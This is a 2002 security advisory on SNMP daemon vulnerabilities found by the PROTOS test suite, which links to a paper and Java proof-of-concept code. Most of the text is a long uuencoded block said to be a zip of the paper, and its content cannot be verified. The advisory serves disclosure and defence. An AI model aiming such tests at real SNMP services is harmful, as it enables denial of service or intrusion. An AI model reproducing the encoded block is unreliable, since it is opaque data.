
SNMP bad protocol implementation leads to vulnerability in all systems
13th Feb 2002 [SBWID-5094]
COMMAND

	SNMP bad protocol implementation leads to vulnerability in all systems

SYSTEMS AFFECTED

	 ALL (or most?) systems that have an SNMP daemon installed

PROBLEM

	The University of Oulu [http://www.ee.oulu.fi] has posted a research
	paper, along with proof-of-concept code, that tests all possible MIB
	functions provided by snmp-trap/snmp-request for buffer overflows,
	format string vulnerabilities, heap overflows, etc.
	

	You can get the paper and the Java code from:
	

	http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/snmpv1/

	

	

	The file below is a uuencoded copy of the research paper (a zip archive):
	

	begin 644 PROTOS Test-Suite c06-snmpv1.zip

	M4$L#!!0````(`(Z*32QZ)I7&D58``-U[`0`@````4%)/5$]3(%1E<W0M4W5I

	M=&4@8S`V+7-N;7!V,2YH=&W$/&MO&DFVWRWY/]1R1UI\',F#`=A)?!PECDGC7

	MKS4DLW-\'HU7174!-FJY.53>8_?5[SJFJ?D&2F;VQ(^U.[(8^==[O\\OE?+N^&

	MDU_N1^S]Y.::W7^XN+X:LD:SW?ZY-VRW+R>7]H/CUE&\'332/C4REBGG4;H]N

	M&ZRQ2-/DK-U>K]>M=2]H*3UO3Q[:G=>O7[<?1L/F(EU&QT>=)C[H=+O\'[4@I

	M(UIA&C;Z^WOG?VDVF>$K$;*95DN6Z>C-P=\'1:>]%\":P0+95%66LFVUH8P76P

	M:*O,)/-VHE6J3#L5)I7QO!T<G;9-O$Q6G39K-A$\\8MX_?S\\:7/;/)U>3ZU\'_

	M_N%N<C=F$WBE.<YD*LX8O-:TKYVW[9?@S9O19,`0B:;XG,G5FZ&*4Q&GS<DF

	M$2RPO[QII.(Q;2.)_\\N\"!==&I&_6,@[5VC0[W9-NHW]^?77[=[:_M]!B]J:Q

	M=7CI[\'_-9\"2,):P5&--@*1SUADZ`7P&&%M&;<;J)Q\'@A1.I`_V\'`)EB(,(N$

	MA;V_5X6^$_:?0-M*X@_A[9F;,_%F3`IVVCHZ:G5?=KJMWM%1@\\5\\*=Z\\&]V.

	M\'@:3NX?^>9ND\"\"]?W%W^@O_>LR#BQKPQ\"!IP,/U?)PMI6,+G@L&_P_&XRT3,

	MIY$(6^P7E6DVU2`9H=E2SA<IBU7*9ED4;0!\'DR6)TBF3Z6_G[?LR^(2GBTC&

	MGP#\\-W3R?)!S[`]I+RB*>&RA]C3Z].2\\/>C_:2C.!LK`[\".\"ML,T?@/XCL;W

	MG6_9`WSC_/YAY\'@1:CY+FPO!0Z\'[/ST,QRC\\,U:<?;AB/[&?\'L1*&O`19ZS3

	MZO1.\\=$E1\\C=HZ-N&_[7Z<*/9[U79\\<=]A-A\\S#ZXCGW0B^E07@HU8708KIA

	M<W!$*7H-I=GG3\"&-AZ#$B98Q_LQX\',*OH32IEM,,\'X\'&HW:$*LB6H\':\'#+BT

	MDB\'`2!<\\99RAD%FJ6.5K>.1<KD1\\2\"!Y%.WO@:7\'<V\'8$M!C7(,U1\"`04\",C

	M$JYYZIU9NA!,:3F7X\"P9VD/+DXJL[S(9OEDT0=#=/LB<U-W].K@83QX&PPE*

	M$$30+:LCGP))/``31==YP8-/<ZTR0$W&P(LE1]_,#A)4$L`>#,R(%^@,)X#,

	M6\"Z32(#X;T6Z5OH3N^$Q&`O1>8\\Z$ZB(\'8QO;^Y?.,,!(E4L4Z#\"\\12,=B;G

	MF;;GJ!D`BQVP6(7\"M!@>!/P2&M]G\"`QYR*.E,BE3RU@V/7(<8,\\-LGX-<F`K

	MKJ5(-P5$X&,(FA0`%B#M.:)`?+T\"R6OX#IL#K]=\\8U!J9?)YDD22QP&B0VRZ

	M!_P#F8`8@\'-R)>&4@X0;QY^V1R@1>B:\"+:XA\"2NA20/W]U0L+(]6G1=LS0TX

	M?@AH<*@A@9ML^CO\"2#P_44-7640,D1$>#6($;T5<1Z4$\\<T7S&SBE#\\R9Z_$

	M:_RY::R_U8)(<_3<B\'2A0A6I>8400GD`*.B5V*!P$\"\'POJ22)@687(>&D$;=

	M;<\'Q9/?`-J$E<`<_`6:`%L,+\'@5X0:\"2<PWR\"9G*0&)S+F.2G.&D4A#XK#*(

	M1VD)(%5#&@EO$,2#,%GD@8\'DT)!#9Z?H>M%)$W\'^BW7\"0%ESHFK0&5]Q&9\'\"

	M(;L!C16/,JL,,_@$C5R1>$%\'0%4`<:VF&8!?\\A@DP\\\"`X+](;8N-U5+06QFH

	M!5OP$.\"5M<N((-,H1T1\"!A8#ZQ[,`IQTR*:4(1A0:B+15.0O<ZV$E\"*(,D,$

	M5\"VVG5K25FA*>FK:2Q6B\\F:/``\'-Q!!\'KL`\"-2(.:J1`M1=2P!N>MAB4C$VY

	M$>#8+%^LUJ)JAEF0&NOITHH&.`KV]X`&\'JK$^UA@NM2LQ%8D%ZQ31\"I!.0!)

	M+J04?JU7]6N]_H0D!\")TR90I.[@/U\\[#@=DT%_B(,4A#^A0/&?OS$7%\'Z/L?

	MZV`;%0\\+X)_NK%[#48UP:Y2SISOVN`\'*D5HY@[2>DDP((=\'&2`-,=3\\].5-/

	M&_U+8>2\\0E=5?WJD/Q4$OBL*+QO]L7.H#OB8O&XNUZ<[^A4<[8+,,Y_\\&K4*

	M#[:1$*%_A-_0LVRA4!7\'L1-\'#;?OBEWG\"%1PBN\')`Z?(/0`($$*#%-PY(7C>

	M1A3:\'ZZ?6$4Z\'1!4(@(Y\\T\'\"G5\'1W2?%H.L-Q<$&!S1Z#$1B\"W@VLC\'4_&\"Y

	M@8\\L8^6/<-BQ(<2FN<*@][SB.]YF\'F5+-RY6_F\"NG33Z#^)S<Y`D)2_XQ&>>

	MVC-\'<?!\\9X*GG6B>/\"^AK]RASTHIN->*@N6\'7(H9AY28?83L:\\L*JO;P1!G3

	M4<GS/WEX[Z+C%)\"9IS(@V`]9))XZ8^IVD42HK;.\\K\'AZ0L\'S754JF1^7T\'2/

	MT;9MY66!YST,4LJ\'+/[!<:)[XNS#HEFV#AE33[J,X)-B<EK!Q.1G3#>66>^@

	MID^>#9N77\\!FG\"V77&^>-6IVP7-^!._E<QYWPDIRR#R22,ET5Q1_(O/:Z5#O

	M>?\")ST7A3I[7SGK@2AT*#OA5T5MXAIRP!\\[U6@8B#OSY6,D/5;+1V!1_#@S`

	MTWXPA0A^A$/)\\/SF[WS%$1?L5WGX:YDNV-_@@Z>W7HN$>,1N)H]V(8+%3([+

	M,YAPJ-9QI\'@(F:_[Z0?*R\"J+33DA[2D<_HX$_$E1<!GH[O.?R[\'VP+\'>JE14

	M@O`S.-$>.-%2H_+\')2C\'6-X\'GV*UCD0XWZI;GX$5Q^`Z/U8Z^7A`,4/Y42\'E

	M&!SJO9;4^$;0]]DT@LSY8[7I_`R>_1B[G0L?5ZJLNM<J$.99L(!,=A\"NI*&>

	M02G(?11QB+TJ2+5+?8\\GUIRI!&&H.?B/Q09=V4QHC+U/VB3E20*DRL<F1+>!

	M^YG`#\\[8NTR&-!$P=B1`PPP(.]@K>[H2*\\=H6L/HXHP]N`%5,8+>%DQYK\'!<

	M\'2L<;W6Z\\Y%I?Y(/..P8#0>1D*2[`8@?)OV7$_=&WR]&-!T;4YO^VR@.P/.9

	M:K7(,PVB#\\!@1=UBY^/)P]WM.RP%E4XY.A+WY`S@%\"/>0S97/#*\'+))+F?JY

	M4XKC\\=C.`E\'+(TSN*).P<YLJ!V@;0W!C!]<\"4G(.NH#3X_\\/*[S(BX,,<&>R

	MXUB#)X&/4-IB>X^S;,\"XP9`G?NJ>3Y.V11@H\',72N!Z8@\'--.WK<.:&CZ6(Q

	M#\",L2->J\\T,FM%;:&@3\'\":Z#B1QQTUT_SK7S;9/WW_,Q+TU+B^\\70&1*K)81

	M1-#4;@=\\\'V;O\'L(T_!2FX:S9N\'[]5$1J;1E+TT?_/;\\I10;FX>0FEC\\H#W<*

	M`\\-UG.N[X=__\\>%N,NHW\\FD_B&FYS&)?!.9<HE6+!3=L;M4.!_\\FT8+;*0H/

	ML`V,DWL&&@S_[;Q^W<,!*F=+&GDC0Y<8<%&_)\\/[]M4]PU4!L`.).4KH,V@)

	M\'F8EPPR*/K^?X\'8)#OWHDA8+<!8\\GVN!JP0M.S#`(;B;;`*&4QOE45Y7H\\E;

	M=I!O\'XQP)4$(\\IX3;CZQMTH\'XH6%CTQ(:#R,PS^<SL8;CS#\"<T@=(G%K$47X

	MK\\*9.&U/&:33?<6T&N!@[L!GLDNI:=Q\"T30?`)T/KX#WN]QUN%3_IH6\\H5HF

	M&:!MVA[[MO=-I@T2\"-SBT*^=WZQ\\\"23M\"97$2Q+/#;,F>C2+G#4#NV6!X?=\"

	MX8@,\\`:%`+=OW+8-4`R<0$X!4ZS$:B/]J<@E1Q(7R$GBQ</;8:=S\\O(KA*,=

	M29\'.B\'@]\"_#_^$HK?4R!RFZ%RJ_0B$0EF4[`I*T_V`HG(%DW%*\\O);`(=:CP

	M1?M[-6\\$`,\\OW][VW5;.5W9RSMOX/;^9L[^WM5N!>,XXJ@;R;2%Q46>AE/&!

	MW1F\'\",^\\8RVE.]YHT1:C367JGYL:R,JK8]G22E964NH_8FFXND#J#B^`4C09

	M[8.0IP3:8I=;`XM\".:.4*=W>^<!]++;<0\"D6V@A@4M`KSY,;I07&BD,0$-B.

	MG.5V[`G&_3_$*J!%BPQD+&EI`Z#FYBEQ162#RAAMD.(0@PP@XSI;)09X.L%A

	MK*1.,]*8J;!LLMS\'TT+7RZ\\L4IE6GG8-+\'J%RN>`\'1X!:!.XE<BO9>1<APBH

	M.3:P:=1I(8Z0=`X@8JA7FVK6-$(C-,;3%/**?)\'\'9,$\"\\>7N-#ILP5>XV0.5

	M169R$_6S3%(ZL#G@,HL4/G1;2S/YB#^BO>/&WLY`B\\\"*71G(AQ4P8HX;0)X-

	M#X6=0/``-BR-Y5Z@2/-$:6!X,7H@&/0!(AYA/`\'+I&-DZC96UE;#DIP&9Z$\\

	M`R[BK,$^Q(V9D\"(1G(T[JAKBEG0,B,4,-\\107VR`<@3AJ1\"M47D`2T!%6#^W

	MAK\"/),IXI:*5U8\"$Z[S1@_)+0!`B1<,E9M;02?DGD#VD:8$HN#.FLTE1,)A.

	M!4K9K@\':\'(;R\',`2[#E2<%8JE]M+4R4ID*AQU8F^\"*R#3`J4Z!#^_82X`DI+

	MMD3TW-Z45YR:?(DFW)\"V?&F!`MJ-(8!!.F;A%BM([GRWBPE&B\'8XRT\"[A0BG

	MJ*+D!VS\"!)Z4/(\'!\"HY,?I?\'+;E8X/:<5A&C5K6<N,?=J9H[/Z0S9I\"\"VA4Y

	MRM_<P0+R<EG*8T*><@;Y#77;#^XO/QB(^Y@P1:@\'U*XR[.\"=2%WOZI#!S[?B

	MT?].EC+./WYATT<H$LD34-CQ1_G-0]H[M`&#UKAL4\"BO(+;8`[<F(7P4`.2-

	MH\"0PLFF@^6($`/N#DCA\'I,G7Z(Q+S@BS;G@\"_BVT8W%,VS:4VU#:YBP$#!^E

	MG7,AIRSO:\";4J\\`=2)NLIUE\"WL1008*QEMMP@KJ\":V_65ZWLJ@G95>$\\3*!Q

	MO5?^F[+)=`\'X)/8$\"+HEMPIV:/U^S0B6&;D_N_UM.5N.\';%80Y!R,C!VQ]&9

	M;65A=M7]-3D,#K/?K&3Q2>_%%_<!_;ME@%(SM08/EPF[A(REA-TS=N7\"LD@,

	M<,TXE/-ER2/8U;X%Y<J1=5W.6]/NIXL*UCLMX7UI4+>5BR!K89M\'GE\"4!QB\'

	M7P+.*-$!&J\"TI!H&#<.EJZ!G<\\KJXBI;R+N4UU\\09@9)P1JY@6P!86,.R\\LI

	M%?!CKB#/_PPAU5=P\"(G*/B\"_+%\'4IOG\";S52V5$L\'GL\\*(0C6V+%$I5D$=<$

	M-+%-,L*RNGJ;[T)R\\(5A[NGT=D0JD+E$J0\'UI7HFMIX.\"+((\'FZG.%L>S/KD

	M*6Z2([EH_-BRJN^W.DS+F1A>4J%%3)=?:V]$>;H`,B^*6O3D>;9>3QRV/:7=

	M,@45H#U9VB0F..#J\"78HDDAMZ\'@#*@+:I4R9<H,KM?M[\\VKOR?C>DU>3W19*

	M\"\\,:TA+0TI`=&/%]*^?=O;(!5@@O0&4=A7D!XY-/C5T`G*^2YZ\'B&HT+M0P8

	M+0-2-.+;67\'?HN1S!RTVQ!0=K$_%S2(KI+(9=`.#24G!+EH,L(/HDH!N0BT,

	MXIC)*+75)PB&.`>F.0,V%F\\-_5OTL4OM;(+CL\\9:H@.@+%PKWSK`2\\C<C<(>

	MBJ\\KT/WG%Q_*/NKC]>\"V>\'\'4@NK5V&+8I^\"S+`YLO*)M:FJ5N+0<ZNJ0%L*K

	MJC@PP\',;7<KB8`>#%XCYU`*GFP:U:F8IN*&$QFV/<RJ>J<I>@U_`G5PT>>=+

	M:OO:+.#8/V&TJ0]``[>1AGRTW\'1YPOX>6`)@!=GHQC]#4IJI:N+DHMPAJHF:

	M\'>!GM>0/`G<`F9<`11S4+A$@2BH``]H5T\"&$X9T<BTH:;0J[+Y_)#N9XK4#8

	M-`XX\\B(75[=E@REGB+8-]4T5(^U5$/Z%WJX7UMIV[*J\'FB54:>5#:T*F!AO(

	M%XM8R^C-CGL6M/)!]VHP=E!0FD.\\OYJ1WZOR\"N_S2$,AQ\'9T,DK`OT4<*4N,

	M6KF_YQ/Y%>TVV$2>+K`]IKZP0*^*_9DZP7!Z%M-)+49W&/;W?,BJ5[3@?[CU

	MLT:P+_B$PL$#5B**2+\'B0YM>`W/^:B/;7UT(Q[8`Q@EMNZ\\E]0>=J.LY7G2@

	MKT1T]6*M<E6G2PN^+5*^8@+!KIE?^BCU?_-;)D_GL:NSA`OGL6\\Q4?;71%#]

	MK;PJJ*&\\9E0N6:]1BNVN0WSH^C4II\"Q0])-3(A^)M\\F$3<FD\\2JPZ_;#:75,

	M<5I:6??]T_>]_-LOJ]]^66R7%ZO5\\%JO,)$B)2AN]MA`NG$5&[-9OPB+I(SJ

	M/$NS22%S*`BUC5[TN1-[:4BLL,^1OVFJF\\RH?Q%(O>AFI^Z:0ZG/3+C>H6&E

	M99CD_+\\(KP5UD4U^3\'UY&IM\'FM(=F[&6;V;90@.7*6)30!2SE\"XL33.7$Q5Y

	M%&ZW[>]A3[=5=!*_W$5L]\'_MU=J&KI$^&5Q<CW(A-)UIV*ZZ_<S.@B-K)-9)

	M#P?WDZN[V_P*:^5EG\\WG.F\"<#KBW+(B)NQ\"+/S[X$?/D??_6^V7[ZZ6_R8A7

	M,$O/[_2<0]E4WM+\"QS@=S4SIP35>BRR!$U!Q26J]``LF>#&WC(B[G%O%Z;)O

	M6[8GK\'C2>?WZJ\'E4?D+M]<HKI=^^*INBPWMB.[P\'>)?S17G6#\"#&>1&$FG+E

	M7$.0WV0L-5Y+*UGN0IG=_+`-_*:-^3Y_MLS:1>_ID]-[^A5ZOT#/!0[_D*@=

	M#6=<<2^3Z.F6OE3X$J4OGYS2EU^3[#<[Z$7O?!?^W4Y-,SO-H]YWQ1].^`K^

	M`[P6MD)]=/IF5UIQKD2-$WR$&8\'M;_CT^0NTO#RJT]+I?%]:7AY]31:(VK`\\

	M_3/@T+5M8>]&N7?2K:+<;1Z]_*XHPPG?0CF?X.>#L=W8=D_J#\'[=/#K^GMCB

	M\"5_!MKSMX\"N_50_B&;A]4O\\FHUY)A)U0\'BYYDOMI<L[P+P8E&YS?@F;-,DV=

	M\'$P(-H=4S;EFH<WO:$`/X3COB\\`\'+D#9V[MVI`ZY(U1GV*YR-^9M4;RK/,$.

	M5\"OO@;4PL;,J_7;PCV],]6;\\LR%FX0^4$C;A)XS.Q[71I3W*C5ROBNG[(?NH

	M(HB(K(.5P#C%Z9#YQJG_59ZJ_:[/OTX`O9,:>GD?8\'S;ZJ#!@`=+J;L*\"CAK

	ML6NNEY\"Y++Z!F3*F!>QL<Q-WVI%[QT]S3VL)2WF?ID@]7U53SU?Y[<)=F6<Y

	M]2^2J7HA8S-C5%*;4,J\\T>]&852DA1)S-U\'5MRU0I>X3=N)P@4>DV*#`81W^

	M&0_J0=CJNS3<,04DGPX7+4%N,W]44X\"WD\'%:NEC.B\\V@_;VB-;!UA]NUAB*P

	M&:P.T.\"V\"KIJRDF91-Z\\R\\L+*.41`\'8O!&74TXW\'U_XI`>\"2BF,140#PI8>%

	MY-JF4(7YO9YD`?\\MY=^WRE_2QP1T)XOITC_>/H>SL9:5,?8;0)OF5$G%V7(*

	M_*96M6](>CDZ1Y#_^938M;+S`0\\2+20Y&#=&8#BAFMN_?E!I`=&A#D=_#H4\\

	M=XC[6RX%;)RZY0J%X)`#J;.8\'MB44_U#]V@083D;U9\\2=2YY,/F\'P#S[L9XJ

	M77OE`LIX\'F^_8S\\=\\A@7T6IPAMB!J\'\\36_&?=SS$90TV,$8%DM,^7`W891/3

	M\\MJ+ER*JTW8IYW+KY9&6`8\".:]\\=/:8:U\"(?]-<^?GNR!>@MEM!XP:3ZQ>QW

	MF9J,C24J61W,^_LM,.]EBG^[H/;%JXN;^I/A=?U)7!:GA_<W2#V272*U\'U]S

	MC*\"Q?-QZ#K7!-K1K!?50[D/MHRR@==_*ZS<0%0!J$T*JV`)R(P.MC)IMO91%

	M*5Y.7M2>WXXF3;N160,$-+V#^%/_NOHD^=8SO8LYMY`<;*G)^&98?[*0JSK$

	MND`]R\'&VE$MPK?6O9S&S=&_`JRWK8IB`OYK*=`L:/@]YG5$_2]`TC!>UY_\\4

	M6CUNP?CG)N)U]?Z_S6/.#O*]2_I[(NB9RKVMFWR?)\'<SY(.FF8S2IHRW/9[U

	M/\\6>RE*%@B9[NQO_U@L6#7@$3#V-::2\"3^:,3;4,Y[@]L\\BF\\%^M:\'/KD!G`

	M(UC@!TL12C?=P;I!V\\\\_W(_QPY^O![?_:>_;F]M&LGO_=Y6_`TI;&TL)21\'@

	M6SOQO;*DF=7&EA1+]DPR-4E!)$1B30)<@)2LJ50^TOV,][RZT0V\")$#)\'N\\D

	MNS4S(@F<?IT^KS[].RJJ/X_#2/FG!4W+4_KLZ,CA=#4<P0Q(?3Z]?IO]BOA*

	ML,R!SM1+\\8P\\H71,U8+.=E*3=^3<A4GP`,J1TH$68?T^3$#G:7,UK67=P1#4

	MKR:Y#`B(@)TP@6T8ST,:;O;;$$@EOO55.,.K->F0T%U6)P!W(AUOHR4:1WCP

	M?41G^NCV`B%,/%C.L\\=R_3&/.;*!Z*=B$#Z2\\L\"<7S\">4%\\UA9;C=!A.I_!O

	M>%.6%PUN\'`1247D&3`,V`IJR=$\"Y7,3BU1MK\")U;8M27SM8(Y@J7\"@DU&N:)

	MBAF\\8HO/CEU=O28DG,V\'<Z8\'8*;@2K(2!UDEUL;I%3#0!S[\"2>-E`ETK\\A`R

	MM*J\'X\'9#>\"Y5SZ@87:_0\"\\\"N4QQK`Z4(C\\NC3XI0?RVA\'^,$#-GU9GD:3F%/

	M-\"9!`_,L_SL!>DC\\`5]#RQR(#PJ)?P6W*\'^>EDMV7CEZM8Y=++0G.6YC@Q5L

	M>3[)I4#P*FP5G[@G0=TR4BE)#^RU:?B)\\V;\\%!ME,SE6F&^4E::94*7NZ\\O)

	M1I=$%!?Q4Q2;V$6PSQX-\"4_#S,QTO8V3E7<P0PJ3JW#_<1;85*Y2`JE)\".J,

	MSN*SMPQ:#P&?.Y\"O0%)%)EWU8IU_-K#]LX&!P;*\"OF(?$83Z0<F=X?U=0PL<

	M#^*!31_S/\\DY0*K.,S.U1@G8=*PO[UH+/N3CI;B0CS)X+4R7.O]P<]!P+N\\6

	MB*J7)46HG`>CH6P`R$!XL&,R%[M-+U_0P1ZGJ(&>H=$QP\".R$.<>\\\"#Y;-EP

	M6Z,BKZTA:MN0C[H?=2:T4Y!_#1%C.:VE<$J&^X^-A$8K^89_)L16LE0*?KRB

	MU,,*<7PQ?MZKY*[LEP^G5\\X^M>-VW0/CARP)[M#.@3O,\\M\\<S*#C+\'GM&JYM

	M&D83I4&^;2/BII]`26*UL)8JQUF+1^.9HR%4$-U;[=+N8X8;\'V\"!P7&P(>)V

	MH])OK-.M_?1`B8,,I(U7\"U.,T6WE<U_L&+\'[^14GI2Y3!K=;X#K?!<G*^T:J

	M(B8J\'@#+2^(4Y4H$F&46IK,TBWEP.B\"B]\'\'N)\");PH[3,0P=BLX!-R(!S6V2

	M:$R[\":.,P6<6U!CP;?8\'-<[B[W(,D0+7@SXF%@Z34*5Q!#YGW*FA)9PU*P.<

	M@5\'C8WH<38>142=I:<!*QF0UG#_\'#X\'(\"6L6,6Z9I8W0=\'+2!;R\"HKUF\'Z7B

	MJRNRTTYB1319,H\\QCS4383@22U*B[!\'MNB*\"U\'ER6ZL!MVGK`?C,:%>%*%>@

	M\"-H9P\\F*9H\\@[Q3<2**,]$!=%;K)OH%)4D?I*>4%S/R_PL\"3&+,#]]_)+L\"E

	M/,;M*_FLF#]@W0-\"7HL\"\"JWOXT0J>4&/&U]X!W)1Z?S=#\\BO_[SW,UF#?)2_

	M,II?$,\\X38;E<)#1.-*KTAB\'=WMTTT4!K/*(Z^\"63X/7W].\'(V=3ZYGO:\"?+

	M2M(0>)F4(\\DFRRR.XBE&\\8;.#Q_.)7MHG3M!L*;Z@@&FD,)\\.U:0DX1\"-LD!

	ML[7R4Y;Z!LB]:UQ6D]Q]#D].TS@SKRPQQ@)T&H_\'*K=_%*9S\'YQ0WH@ZUY?>

	MPCCZ0N_*1FY6)+L8YT2B@>SR32E;(V%Y`L9HG1]L.#].^!9=7>4E$Q=*G)+W

	M)&L*F@\'N<FJB7.H$9)YWM2H8FL;\\HQ&%H&=^BI$VHL0,;WZ#Y!XHL0*-OF$0

	M8@:_T.6$V\"0A92/7SLS^WW!ZB,G]XA.-<,@J`XEF\'G,=U*O&3<.7+\\[O%*:L

	M_#B*`S9BI%U8$4PYFCXJRTMZAZG+E+RTR(;T\\@73D&Z85Q(DC*`,ND0T*(?6

	MC;,>P_\"CK\"AI5\":W8`+5G14YWL!^DH;PR:3,OZ[#)2NWRXYMLB)I4Q6&4`F0

	MJ(DX8YFX0EI\'[:W!GF\\?\'6$YNLX`4YNM6*[SRW1)RF^)\\MK7CRIZ<K!,`N^G

	MFG-Z=5YSKM]]@#_/WAU?\'-^<U=#A/F!P8J\"*YPKZ!-=H]S+2Z*#XRR<P_>X\"

	M2AXF[<=Y79%*;4$ES-T(992<-:FFF-/)UT\\R7J![=J=R[04ZN<T$L_7Y,>LV

	MCD;`_8;^7(\'\"XCDC[HE4X3JKKK-&Q\\VJQ:2:NRL@3`F:*L]>F4-X[&GX+D;J

	MO\'&\\*\\=`<Q]92\'\"8_:C@BI\"*81E2K>#ZH[J>,M*`5.R\\\\N@S,2A3P\'\\_@\"J8

	M2$@-A!7ZPO\"*,0,\\>D.(*MG\"ZD6NRYC\'9#0>I*A#;\\CN,BEJ/:S+)4#SFMA,

	M^HHXZV(NL8NUB:7D)I3YC=HYF\'</#[/QI&4=[1\\?%1U&],@2&HT2VL>41Y:,

	M@X46[HDV5:EK7X]_R?W+X7?*5>G,-W?=G%\'FYB$_K:P_\\<VO5FSSHG0X8F4*

	MNX\"5$+)N8XM<\"VHY`QQR,.5ZX;,,I[\"OOA\\HMW5$O*Q<7_6\'?UN&\"4E$<*4I

	M(9@<&]3R&+#Q1[1!$5N?=*_.E[)N>ZS<]-\"=6\\3QU+A/K8XOU>&F\"-<AF**@

	MID?`\'P&?O[ZYP#0*OO&$&`C+M\'[A+Q.\\93V3NT_<#CY(^T%+$G$C^!HB)6C6

	M[Y*`#\'.^ZF\'%E*C+-4H1E.QSQ;Y!1,RG)A*\\)[T`V2`M,J8D)EU#W4\\5F&\'\"

	M0(9TFY<WOOK)YS(4).3Y;@4.\"P444;`-B54RRO6PG^-2!61PD^)14%-&V+O!

	MX(H,4:\"<$%XF!)XR!%[1A3F?>IEG#.6!<G\"![[-CB$TE]8,+I^\\OXDF*-8\'$

	M#YP4`4LA:V.EC_*/N8F7I%Z,?=-4JH.1$=LPT$T#^J`(`[=@;^?J,L#G4[V5

	MUL\'H&ID2$2^=>5-5M)XL\'=U8FH=@6!+3HBS@O2IP];\"F\\2=D,0R?I2\'EK@<3

	M_QYOS\\7:,J1=9/N/>)\".]N74B,W13L\";3`Z7,%`&4$\'W@\"F.HZ(?E,X!SS$8

	MDR`\'^ROFC%SN<($PX)T58[1/3!5^.4Z4USGQ?\\7H[YA9]A9\\%[S/RD\\1EH(T

	MAPX0Y7\"F=\'_<=Z+E(IT$4TKH*.QOR%H>&IHOQ5/(2K]0+C1=G34NY\\$8Y@\'6

	M\\GB8F&YY)G#5F9\"9#D\\,*8(JA6U^IBXCOS<VZOZ;L_<\'AF#G>[E9P\"<O26!\"

	M\\8AD>L^J%0]TZ!Y2D1C&@%3#N>#[IQ@0E8E\"1GJD,R5P7<%`F@;1>#&A*_R+

	M8,RGBHN$+O!1@%682;GZB7*[Z\'8U$&.O!09B`;3D+E7\'8Y@\"DK#*<R!5+@Y4

	MRHS.38ESYM,5;KP\\@\\V`ZT*FD,%;F6,CH`(P#=,PBS<KNT,\"6XH>=SO![:\"\"

	M1LID(2@*ZXZJZ4(J\\NKN*AJ?VK%%>YVYB,Z`4XG,83^6C!-!#\'&(?<`M$7\"I

	M!7N67K[@>1+G=(HG9R2L@%%UK*I&J\"$F8S,CL\\PG59.(^Y>M$=U489,V7FF6

	M&BV,+N6*-<#G`A&7P^*V@TS9T1Z\'\"G%\">>#9)1+%L$52)Q-^+U\\HE6L5ISC*

	MY]S[40Q3]U@WZ+,4/SW_J*HWT668\"E%ZHV=UU3.C`6M6E)BADWAC9G9*T]\\I

	MK_ZLWK22>Z-[?QJ.B/UYKSO[;P]X\\RN8D#!)%\\9E4,S61+1:4S]PTC>34L`*

	MM\'3FLMT3&\'4-F5$N];&G0J17B(72,^D5T)*_3/\"&H@`]C-#,#CXK8ASDEI,I

	ML;P_3H^<#Q%E%OJ@&(S3D9KNS(D8A4K@UK!`T+VZ\'K\'2?KM,^S\".5ZES(W.M

	M<N98[!92-5/.\\1AT^J@G*9L/H>Q<?\'C[EH$5\"FEUJ]!Z<WGY]NSX8@.Y7A5R

	MYQ<W9S_`?]>3ZU<A=WER<W9S??/^_.*\'#20\'E09\\OI6@VZQ\"\\/KL7S^<79R<

	MU2^_WT#2K4;R9C,UK](DOOG+V<E-_?ST[.+F_/OS3:OCMJH0?G]VO($/W785

	M6F<7\']YA<;^STPT4S5UR`_[`U!G[\"8;.)&(<S$)][W*[*\'\'-C4*/JRV,:\'W@

	MWBVP\"<I%F,7W`1\\Y4W$XPD4I)-DKD+\\@7!*?#1T0@LH/,0)2*\"13PWHK(\'UN

	MB_9+D&AWH%_%E9MAXB\">I_T:)+%8*F+4.6P\'<\"Z.MN\\*&_`*&M\"VX1&%4Q\'[

	MA\\ZZ;L.Q_HG-EOU_.JP?N!Q8&D?A8CD*,H%//WK_X76Z#-1T\"_-9W`F3`=]2

	MSO$M9@U!VT,])%8VSGX(=O>^]Q\\M[^\"?ZFX-_^RVZ4^*M!:2-WDR.W\'>;_$9

	M%9[G[K</>/\')4Y44O^Q\\T2?X`4+@$8@1-49K2LR^M:AKG:[Z\"SO96M?\'-_9\"

	MOR5?1PVX^1E^K#OPG\\X![9PS!-:12WH4:&36,J]AV>0O;?(_\\)DNG1/1<BL&

	M(2>(K_$\"7]X91[:TV.2NF,R$_X,\'L>PIF.NP1J_\\5\\7-FUSV-LZ!-VG_`Q4U

	M^D5W\"V)AZPJU@\'7X*:$*Z.;Y/CG..S_P?^^G?M0\\P$@8$U7)F6JWT):#?M:<

	MO3^F>S7G51/^#!8$<%#8]=;Z\'1@MIU,!W_3Q$!B7JGF0[7=V\"<($7,QQ&$4*

	M\\6FEB?;N3>AL^UDX2HMR)KZWU_Y[6R2@^$\'!RW,!__YC],?/]%=C,!B,\\*]_

	M;/SC:$]A6X:)81N\"01X57GW\\WE[P$[62VMK*2R:U\\C3DPH7/+#=<ZSW^\\H]4

	MQ;9@0DV5<<EYC9E\'NR;>\\1$E\'+\'XY?DI&+7X;WNO!YP=/V5!2$P7(98=6)H\'

	MSFWB1YB:6]RA[DJ\'+!>;H%`>TP;\\0TY`37VZ(`R\"\\*X1WEVP.:FG`;\\[QZJK

	MPBAQC>,IK\'ZH\'NNZWICZ2FN1_6`V7SP>.!_]Y`WB1B\',#UURH8F@@`4P6^Y7

	M1Z7&YKJ$`U)Y,J]8-1DCHI_95<B$;F%/^T4]S?>!S8`)Y@U8?.7L(T/#__<.

	MJ`(CRM.&[NW6894?CB)9,*Q&P;C>V5ORWT%]:U<-]_L!FPU:\'!*J$7:>_\"_2

	MQ(;AHNP6:J<HY^B[0_\"%V4<\'Q1)$A0B0;XZ<-R$:)7BORHBD94G\'9T<VRE[!

	M(]\\?.99\\*7KF_(AN36N-7O3,NR/G7<CYRNGC[#:>%CUT>>1H>\\7X>16Y:$_\'

	MXK3G!G)C?\\I7R,X.:I9`R`(WVC\"4`-CG(!F&&AY!88+R\"0KE-5*,R@+WI\"`^

	MD)*H5I9?)4FSA2`@=L!]STSNLP;`G,;#0.RY+!+$NP`;R$8#`U#C$<_<&K89

	MD2L[0`+/6:R+_1EQS37C,P/M.41O^)P%VE=*KMDIKER@%A>)\\F14O/\\.JWUK

	M5\"*[Q.F<JZ\\@.*%/1Z^%/RM[*.50ID(`]&=@FR[L7\"Z>,B.WZ^4+2N]E@`75

	M)?J=0BV8DRHP=N$L1)RH3RA^T)BBUS,@2<JX)N0L?*_AG`;0B:E<JL/.J\\X2

	MJ)B^PV=#<)A1ODYNICMF#;DLG.<VNR\"ELA$=.:6A##G14E2GR1O6-BT,XXUD

	M=)6R:NV7N=Z/S\'*(T#Y_J_LXNEU\"<B<*?2C[ZGN*GI%^=?Y@9MEFBU\\^>(>N

